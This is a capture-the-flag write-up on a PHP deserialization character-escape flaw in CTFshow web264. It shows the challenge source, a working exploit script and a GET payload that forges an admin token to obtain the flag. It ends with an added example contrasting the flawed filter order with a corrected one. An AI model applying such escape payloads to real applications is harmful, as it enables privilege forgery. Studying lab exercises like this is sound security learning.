CTFshow Deserialization web264
Contents
- Source code
- Approach
- Solution
- Summary
Source code
index.php
```php
<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-12-03 02:37:19
# @Last Modified by:   h1xa
# @Last Modified time: 2020-12-03 16:05:38
# @message.php          | the hint is given here
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/

error_reporting(0);
session_start();

class message{
    public $from;
    public $msg;
    public $to;
    public $token='user';
    public function __construct($f,$m,$t){
        $this->from = $f;
        $this->msg = $m;
        $this->to = $t;
    }
}

$f = $_GET['f'];
$m = $_GET['m'];
$t = $_GET['t'];

if(isset($f) && isset($m) && isset($t)){
    $msg = new message($f,$m,$t);
    // The filter runs on the already-serialized string, after the length prefixes are fixed
    $umsg = str_replace('fuck', 'loveU', serialize($msg));
    $_SESSION['msg']=base64_encode($umsg);
    echo 'Your message has been sent';
}

highlight_file(__FILE__);
```
message.php
```php
<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-12-03 15:13:03
# @Last Modified by:   h1xa
# @Last Modified time: 2020-12-03 15:17:17
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/

session_start();
highlight_file(__FILE__);
include('flag.php');

class message{
    public $from;
    public $msg;
    public $to;
    public $token='user';
    public function __construct($f,$m,$t){
        $this->from = $f;
        $this->msg = $m;
        $this->to = $t;
    }
}

// The cookie only has to exist; the object itself is read from the session
if(isset($_COOKIE['msg'])){
    $msg = unserialize(base64_decode($_SESSION['msg']));
    if($msg->token=='admin'){
        echo $flag;
    }
}
```
Approach
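This is a typical character-escape problem in PHP deserialization.
Each time fuck (4 characters) is replaced by loveU (5 characters), one character escapes from the string.
First, get the serialized result directly:
```php
<?php
class message{
    public $from;
    public $msg;
    public $to='a';
    public $token='user';
}
$msg = new message();
$umsg = serialize($msg);
echo $umsg;
//O:7:"message":4:{s:4:"from";N;s:3:"msg";N;s:2:"to";s:1:"a";s:5:"token";s:4:"user";}
```
user has to become admin. The part that needs to escape is actually ";s:5:"token";s:5:"admin";}, which is 27 characters in total, so 27 replacements are needed.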
Solution
exp
```php
<?php
class message{
    public $from;
    public $msg;
    public $to;
    public $token='user';
    public function __construct($f,$m,$t){
        $this->from = $f;
        $this->msg = $m;
        $this->to = $t;
    }
}
// from and msg are left empty (serialized as N)
$f = null;
$m = null;
$t = 'fuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuck";s:5:"token";s:5:"admin";}';
$msg = new message($f,$m,$t);
$umsg = str_replace('fuck', 'loveU', serialize($msg));
echo $umsg;
//O:7:"message":4:{s:4:"from";N;s:3:"msg";N;s:2:"to";s:135:"loveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveUloveU";s:5:"token";s:5:"admin";}";s:5:"token";s:4:"user";}
```
index.php GET:
?f=&m=&t=fuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuckfuck";s:5:"token";s:5:"admin";}
message.php: add msg=xxx to the Cookie
Summary
An easy challenge.
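The root cause next to its fix, as an added example that is not part of the original write-up or the challenge code: the helper names filter_words, store_filter_after, store_filter_before and load are hypothetical. It runs the write-up's input through both orders of filtering and serializing; when the filter is applied to the fields before serialize(), the length prefixes match the final strings and token stays user.

```php
<?php
// Added example, not the challenge's code; helper names are hypothetical.
class message {
    public $from;
    public $msg;
    public $to;
    public $token = 'user';
    public function __construct($f, $m, $t) {
        $this->from = $f;
        $this->msg = $m;
        $this->to = $t;
    }
}

// Same word filter as index.php.
function filter_words(string $s): string {
    return str_replace('fuck', 'loveU', $s);
}

// Order used by index.php: the filter rewrites the serialized bytes, so the
// s:N length prefixes no longer describe the strings that follow them.
function store_filter_after(message $m): string {
    return filter_words(serialize($m));
}

// Corrected order: filter each field first, then serialize, so every length
// prefix is computed from the final value.
function store_filter_before(message $m): string {
    $m = clone $m;
    foreach (['from', 'msg', 'to'] as $field) {
        if (is_string($m->$field)) {
            $m->$field = filter_words($m->$field);
        }
    }
    return serialize($m);
}

// Only the expected class may be instantiated; "@" hides the PHP 8.3+
// warning about bytes left over after the first complete object.
function load(string $blob): ?message {
    $obj = @unserialize($blob, ['allowed_classes' => ['message']]);
    return $obj instanceof message ? $obj : null;
}

// The write-up's input: 27 filtered words followed by the 27-character tail.
$t = str_repeat('fuck', 27) . '";s:5:"token";s:5:"admin";}';
$after  = load(store_filter_after(new message('', '', $t)));
$before = load(store_filter_before(new message('', '', $t)));
echo "filter after serialize:  token = {$after->token}\n";
echo "filter before serialize: token = {$before->token}\n";
```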